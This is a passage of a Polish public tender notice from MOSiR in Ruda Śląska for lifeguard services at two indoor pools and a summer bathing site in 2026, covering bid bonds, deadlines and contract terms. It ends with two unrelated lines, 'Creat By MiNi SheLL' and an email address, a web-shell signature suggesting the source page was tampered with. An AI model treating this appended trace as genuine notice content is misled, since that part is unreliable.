jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku wykonywania i nie zakończenia jeszcze usługi, Wykonawca zobowiązany jest podać na jaką wartość, do momentu upływu terminu składania ofert, umowa została wykonana. Wartość ta będzie brana pod uwagę do oceny spełnienia warunku. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/><br/><br/>c) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych oraz uprawnień niezbędnych do wykonywania zamówienia publicznego, a także wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami. Mając na uwadze zapewnienie odpowiedniego przebiegu postępowania, Zamawiający działając na podstawie art. 274 ust. 2 ustawy wymaga, aby Wykonawcy dołączyli do oferty podmiotowe środki dowodowe, aktualne na dzień złożenia, t.j. wykaz osób dostępnych Wykonawcy w celu wykonania zamówienia publicznego, o którym mowa w rozdziale XIX ust. 4.3 niniejszej SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości:<br/>1)	dla CZĘŚCI I – 3 600,00 PLN<br/>2) dla CZĘŚCI II – 3 400,00 PLN<br/>3) dla CZĘŚCI III – 1 300,00 PLN<br/>(maksymalnie 1,5% wartości zamówienia)<br/><br/>2. Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w niniejszym rozdziale SWZ.<br/><br/>3. Formy wnoszenia wadium: wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/> 1) pieniądzu,<br/> 2) gwarancjach bankowych,<br/> 3) gwarancjach ubezpieczeniowych,<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2025 r., poz. 98).<br/><br/>4. Termin wnoszenia wadium upływa w dniu: 27.10.2025 r. o godzinie 10:30.00<br/><br/>5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego <br/>w banku ING BANK ŚLĄSKI nr rachunku: 30 1050 1331 1000 0022 8773 6538 z dopiskiem:<br/>Dla CZĘŚCI I: wadium na zabezpieczenie oferty w postępowaniu na „Zabezpieczenie ratownicze na pływalniach i kąpielisku letnim Miejskiego Ośrodka Sportu i Rekreacji w roku 2026 – CZĘŚĆ I<br/>Dla CZĘŚCI II: wadium na zabezpieczenie oferty w postępowaniu na „Zabezpieczenie ratownicze na pływalniach i kąpielisku letnim Miejskiego Ośrodka Sportu i Rekreacji w roku 2026 – CZĘŚĆ II<br/>Dla CZĘŚCI III: wadium na zabezpieczenie oferty w postępowaniu na „Zabezpieczenie ratownicze na pływalniach i kąpielisku letnim Miejskiego Ośrodka Sportu i Rekreacji w roku 2026 – CZĘŚĆ III<br/><br/>UWAGA: Wykonawca składając ofertę na część I, część II i część III winien wpłacić wadium zarówno dla CZĘŚCI I, CZĘŚCI II jak i CZĘŚCI III.<br/><br/>Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składania ofert.<br/><br/>6. Wadium wnoszone w postaci niepieniężnej należy złożyć z ofertą poprzez Platformę e-Zamówienia – w wydzielonym, odrębnym pliku. Należy przekazać oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>UWAGA: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, treść dokumentu wadialnego musi zapewniać możliwość zaspokojenia interesów Zamawiającego co oznacza, że uzyskanie zagwarantowanej zapłaty wadium musi obejmować wszystkie wskazane <br/>w ustawie przesłanki zatrzymania wadium, o którym mowa w art. 98 ust. 6 ustawy, tj. działania lub zaniechania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>Szczegółowe wymagania dotyczące wadium znajdują się w rozdziale XXII SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, zawiera załącznik nr 5.1, 5.2 i 5.3 do SWZ.<br/><br/>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455 ust. 1 pkt 1 ustawy) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami zawartymi w załączniku nr 5.1, 5.2, 5.3 do SWZ.<br/><br/>Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy.<br/><br/>Przed zawarciem umowy należy dopełnić formalności, które zostały wskazane w Rozdziale XXX SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-27 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-89dfa1a2-bbd1-4cb6-8e05-97157d991181</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-26</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przedmiot zamówienia obejmuje usługi w zakresie obsługi ratowniczej świadczone na rzecz Zamawiającego na obiektach MOSiR, podzielony jest na trzy części.<br/><br/>CZĘŚĆ NR 1:<br/>Realizacja usługi będzie się odbywać na obiekcie basenu krytego przy ulicy Pokoju 13 w Rudzie Śląskiej – Nowym Bytomiu (kompleksowe zabezpieczenie obsługi ratowniczej), w okresie od dnia<br/>02 stycznia 2026 r. do dnia 30 grudnia 2026 r. , w następujących okresach:<br/>- od dnia 02 stycznia 2026 r. do 22 lutego 2026 r. oraz od dnia 02 marca 2026 r. do dnia 21 czerwca 2026 r. oraz od dnia 07 września 2026 r. do 30 grudnia 2026 r.<br/>Szczegóły w opisie przedmiotu zamówienia (zał. nr 4 do SWZ) oraz projektowane postanowienia umowy (zał. nr 5.1).<br/><br/><br/>CZĘŚĆ NR 2:<br/>Realizacja usługi będzie się odbywać w obiekcie basenu krytego przy ulicy Oświęcimskiej 90 <br/>w Rudzie Śląskiej – Kochłowicach (kompleksowe zabezpieczenie obsługi ratowniczej), w okresie od dnia 02 stycznia 2026 r. do 31 grudnia 2026 r., w następujących okresach:<br/>- od dnia 02 stycznia 2026 r. do dnia 15 lutego 2026 r. oraz od dnia 23 lutego 2026 r. do dnia 26 czerwca 2026 r. oraz dnia 01 września 2026 r. do 31 grudnia 2026 r.<br/>Szczegóły w opisie przedmiotu zamówienia (zał. nr 4 do SWZ) oraz projektowane postanowienia umowy (zał. nr 5.2).<br/><br/><br/>CZĘŚĆ NR 3:<br/>1.	Realizacja usługi będzie się odbywać na obiekcie:<br/>1) kąpieliska letniego przy ulicy Ratowników 2 w Rudzie Śląskiej – Nowym Bytomiu (kompleksowe zabezpieczenie obsługi ratowniczej), w okresie od 26 czerwca 2026 r. do 31 sierpnia 2026 r. Szczegóły w opisie przedmiotu zamówienia.<br/>2) kąpieliska letniego przy ulicy Ratowników 2 w Rudzie Śląskiej – Nowym Bytomiu, jako prawo opcji zgodnie z art. 441 ustawy Pzp (zabezpieczenie obsługi ratowniczej po otwarciu kąpieliska pod warunkiem słonecznej pogody (o temperaturze powyżej 25˚C lub umożliwiającej komfortowe korzystanie z basenu) w dniach 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25 czerwca 2026 r.). <br/>Szczegóły w opisie przedmiotu zamówienia (zał. Nr 4 do SWZ) oraz projektowane postanowienia umowy (zał. nr 5.3).

Creat By MiNi SheLL
Email: jattceo@gmail.com